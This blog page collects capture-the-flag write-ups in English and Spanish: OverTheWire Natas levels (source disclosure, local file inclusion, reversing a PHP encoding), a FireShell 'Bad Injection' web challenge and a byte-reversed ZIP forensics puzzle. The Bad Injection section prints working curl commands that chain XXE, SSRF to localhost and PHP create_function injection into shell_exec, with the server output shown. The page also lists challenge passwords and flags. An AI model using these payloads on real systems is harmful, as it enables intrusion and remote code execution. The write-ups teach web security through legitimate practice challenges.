Using the flag obtained in the previous challenge, we go to the URL showed in the description and we will see the following screen.
It’s just a simple web page with a basic input form, if we type nonsense we get an error message displaying Wrong secret, we proceed to click the the View sourcecode
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
This is supposed to be the backend code of the HTML page we just saw, the important part of this challenge is in the PHP code functions, taking a quick look the data flow looks like this:
Check if submit key exists on $_POST
Pass $_POST[‘secret’] to encodeSecret function
encodeSecret function will apply some transformation to the secret and return it
The transformed secret must be equal to 3d3d516343746d4d6d6c315669563362, otherwise we are getting the Wrong secret error we saw already
As I say before, the important part is happening inside the encodeSecret function, the code is basically doing this:
So we need to perform exactly the same operations but in reverse order to obtain the original secret, ie: the old bin2hex should be hex2bin, I don’t know if we should call this reverse engineering, anyway ¯\_(ツ)_/¯
We get the secret: oubWYf2kBq, we try it on the input form.
The flag for the next level, natas9, is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
In this challenge we take advantage of a security vulnerability called Source code disclosure and then we did basic reverse engineering on the PHP code.
Hi everybody, this is the first CTF I play this year, it was organized by the FireShell Security team (thank you so much guys!) and this the writeup for the Bad Injection challenge from the web category.
This challenge was special because I played with some folks from work, special thanks to yovasx2 for playing this CTF with me 🙂
The challenge starts by giving us an IP address running a web server on the Internet: http://68.183.31.62:94
There is nothing interesting in the website besides a section called List, this section displays an image with an interesting URL.
The resources are loaded using some kind of downloading script, the download script receives two parameters, file and hash, the hash corresponds to the hashed version of the value of the file parameter.
In the above code we notice two things, the location in the server were the application “lives” and also the existence of the Routes.php file, we proceed to download the file.
The custom route receives some request body and if the length is greater that 1 calls the Test function from the Custom class.
The admin route can receive two parameters, rss and order, if both exists then a validation happens, the validation checks if the request comes directly from 127.0.0.1 which is localhost, if this is true then the sort function from the Admin class is called.
Here are some other Interesting files I downloaded based on what we learned from the index.php file.
We start looking at the Custom.php and Admin.php controllers, the Custom class looks like this.
class Custom extends Controller{
public static function Test($string){
$root = simplexml_load_string($string,'SimpleXMLElement',LIBXML_NOENT);
$test = $root->name;
echo $test;
}
}
The Test method receives an string which then is parsed as an XML, the resulting object should contain a name attribute that is printed back to the user. The Admin class looks like this.
That it’s! the sort function uses the create_function method internally, the create_function method is very similar to the eval method, meaning if we can reach that part of the code, essentially we we can achieve code execution on the server 🙂 now the problem is how to do that since this function can only be called if the request is coming from localhost.
Remember the Test function accessible via the /custom path? that’s our way in! this function receives some input and then parse it as XML, we can take advantage of this vulnerable parser and exploit a vulnerability called XML External Entity (XXE) Processing which essentially allow us to load remote (or internal) resources.
I’ll explain this in the following example, on a command line we start by defining some variables so it’s more easy to work.
$ url='http://68.183.31.62:94/custom'
$ xml_content='<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=https://www.alevsk.com">]><root><name>&test;</name></root>'
$ curl --request POST --url "$url" --header 'cache-control: no-cache' --header 'content-type: application/xml' --data "$xml_content" | base64 -d
In the second line we are defining our XML payload, we are try to load an external resource inside the DOCTYPE tag and we are saving the response on a “variable” called test (wrapped by root and name tags), then we are doing a post request to the vulnerable service, if you are wondering why do we need &test that’s because our payload will be handled by:
The simplexml_load_string is going to process our input and then return an object, that object is expected to have a name attribute which is stored in the $test variable and then printed to the user, we are essentially using this vulnerable service as a proxy 🙂
Now, instead of querying https://www.alevsk.com we are going to do a request to http://68.183.31.62:94/admin?rss=SOME_URL&order=PAYLOAD and since the IP address of the server is the same IP of the client making the request (localhost) boom! we just bypass the admin validation and now can reach the vulnerable sort function in the Admin controller.
Exploiting the create_function call was a little bit tricky at the beginning, it required some work crafting the PHP payload in a way the final result was valid php code without any syntactic error.
According to the PHP documentation, this function receives two string parameters, the first one is the parameters and the second one is the actual code of the function we want to generate.
The sort function receives two parameters, $url and $order, we control both of them but the important one is $order because it’s going to be replaced in the string of the second parameter of the create_function function.
After some thinking I came with this idea, I’ll explain why.
Maybe I over complicate the things but I remember having some issues with single, double quotes and parentheses, anyway the result is valid PHP code :), the ($aaa=” thing at the end is important because it allow us to wrap the rest of the code (everything after shell_exec) into a string variable (like ignoring or skipping the code).
Note: Since I had access to the source code I did several test on my local environment so once I got a working payload I was able to put an exploit together, I needed to encode first the code into the xml before sending the post request.
Putting everything together looks like this.
$ url='http://68.183.31.62:94/custom'
$ xml_content='<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=http://localhost/admin?rss=https%3A%2F%2Fwww.website.com%2Fpath%2Fxxe.xml&order=id%2C%20null)%20%26%26%20die(shell_exec(%27ls%20-la%20%2F%27))%3B%20(%24aaa%3D%22">]><root><name>&test;</name></root>'
$ curl --request POST --url "$url" --header 'cache-control: no-cache' --header 'content-type: application/xml' --data "$xml_content" | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2197 100 1892 100 305 6348 1023 --:--:-- --:--:-- --:--:-- 7347
total 116
drwxr-xr-x 1 root root 4096 Dec 26 18:10 .
drwxr-xr-x 1 root root 4096 Dec 26 18:10 ..
-rwxr-xr-x 1 root root 0 Dec 25 23:47 .dockerenv
drwxr-xr-x 1 root root 4096 Dec 25 23:50 app
drwxr-xr-x 1 root root 4096 Dec 4 15:47 bin
drwxr-xr-x 2 root root 4096 Apr 10 2014 boot
-rwxr-xr-x 1 root root 1122 Feb 15 2016 create_mysql_admin_user.sh
-rw-r--r-- 1 root root 31 Dec 26 03:34 da0f72d5d79169971b62a479c34198e7
drwxr-xr-x 5 root root 360 Dec 25 23:47 dev
drwxr-xr-x 1 root root 4096 Dec 25 23:55 etc
drwxr-xr-x 2 root root 4096 Apr 10 2014 home
drwxr-xr-x 1 root root 4096 Feb 15 2016 lib
drwxr-xr-x 2 root root 4096 Jan 19 2016 lib64
drwxr-xr-x 2 root root 4096 Jan 19 2016 media
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
drwxr-xr-x 2 root root 4096 Jan 19 2016 opt
dr-xr-xr-x 331 root root 0 Dec 25 23:47 proc
drwx------ 1 root root 4096 Dec 26 18:10 root
drwxr-xr-x 1 root root 4096 Feb 15 2016 run
-rwxr-xr-x 1 root root 549 Feb 15 2016 run.sh
drwxr-xr-x 1 root root 4096 Jan 19 2016 sbin
drwxr-xr-x 2 root root 4096 Jan 19 2016 srv
-rwxr-xr-x 1 root root 67 Feb 15 2016 start-apache2.sh
-rwxr-xr-x 1 root root 29 Feb 15 2016 start-mysqld.sh
dr-xr-xr-x 13 root root 0 Jan 26 19:06 sys
drwxrwxrwt 1 root root 4096 Jan 27 03:30 tmp
drwxr-xr-x 1 root root 4096 Feb 15 2016 usr
drwxr-xr-x 1 root root 4096 Feb 15 2016 var
The flag was inside the da0f72d5d79169971b62a479c34198e7 file, so we just cat the file and got the flag: f#{1_d0nt_kn0w_wh4t_i4m_d01ng}
Utilizamos la bandera obtenida en el reto anterior y accedemos a la URL indicada en las instrucciones del reto, veremos una pantalla como la siguiente.
Inspeccionamos el código fuente de la pagina y observamos un par de cosas interesantes:
Vemos dos hypervinculos (index.php?page=home y index.php?page=about) y un comentario que dice:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
Dependiendo el valor del parámetro page el contenido de la pagina cambia, todo apunta a que estamos ante una vulnerabilidad de tipo Local File Inclusion, escribimos texto aleatorio solo para verificar la vulnerabilidad.
La bandera para acceder a natas8 es DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
En este reto aprovechamos un fallo de seguridad llamado Local File Inclusion, con el que es posible leer otros archivos que no son accesibles directamente en el servidor.
Utilizamos la bandera obtenida en el reto anterior y accedemos a la URL indicada en las instrucciones del reto, veremos una pantalla como la siguiente.
Es solo un formulario donde nos piden ingresar una contraseña o secreto, al introducir cualquier cosa obtenemos un mensaje de error.
En la misma pagina hay un enlace que dice view sourcecode (ver código fuente), damos clic y veremos lo siguiente.
La parte importa es:
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
Es un código php muy sencillo, podemos ver que obtiene un parámetro via POST (el que enviamos mediante el formulario) y lo compara con la variable $secret, ademas hace include de un archivo interesante includes/secret.inc
Accedemos a ese archivo usando el navegador.
Y utilizamos el secret que acabamos de descubrir en el formulario inicial.
La bandera para acceder a natas7 es 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
En este reto aprovechamos un fallo de seguridad llamado Source code disclosure, en donde tenemos acceso a código que solo debería ser consumido del lado del servidor.
Para este reto nos daban un archivo comprimido zion.tar.gz, procedemos a descomprimirlo y obtenemos otro archivo llamado YouKnow.
El archivo no tiene extension pero utilizamos el comando file para ver que tipo de archivo es.
Parece un archivo de Microsoft Word Office y sabemos que los archivos docx en realidad son archivos en formato zip.
Procedemos a descomprimir YouKnow
Obtenemos varios archivos y carpetas, comenzamos a analizarlos de uno por uno, sin embargo no encontramos nada que haga referencia a la bandera del reto. (analice la imagen del conejo con un par de herramientas de esteganografía pero no había nada)
Damos un paso atrás y abrimos el archivo YouKnow en un editor hexadecimal de su elección, you utilice Sublime
Observamos la cabecera estándar PK del formato ZIP
Al ir analizando el archivo, hacia el final, algo salta inmediatamente a la vista.
Parece que hay otro archivo Zip concatenado al primero pero los bytes están en orden inverso (observen como el archivo termina en KP, y vemos algunos strings como lmx que seria xml).
Podemos utilizar python para invertir los bytes del archivo fácilmente.
Obtenemos el archivo con los bytes invertidos y procedemos a descomprimirlo.
Obtenemos nuevamente varios archivos y carpetas.
Y en donde estaba la imagen anterior del conejo rojo ahora encontramos otra imagen, esta vez de un conejo azul que nos muestra la bandera del reto 🙂
La bandera del reto es sctf{m41nfr4m3_4cc3ss_c0d3_1337_4lw4s}
Bonus
Programe una pequeña herramienta en python llamada reverse bytes para invertir los bytes de un archivo utilizando una cli mas amigable.
usage: rbytes.py [-h] [-o OUTFILE] infile
A simple python script for reverse the bytes of a file.
Author: Lenin Alevski Huerta Arias
Year: 2018
positional arguments:
infile Input file
optional arguments:
-h, --help show this help message and exit
-o OUTFILE, --outfile OUTFILE
Output file
Happy hacking 🙂
This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.AcceptRead More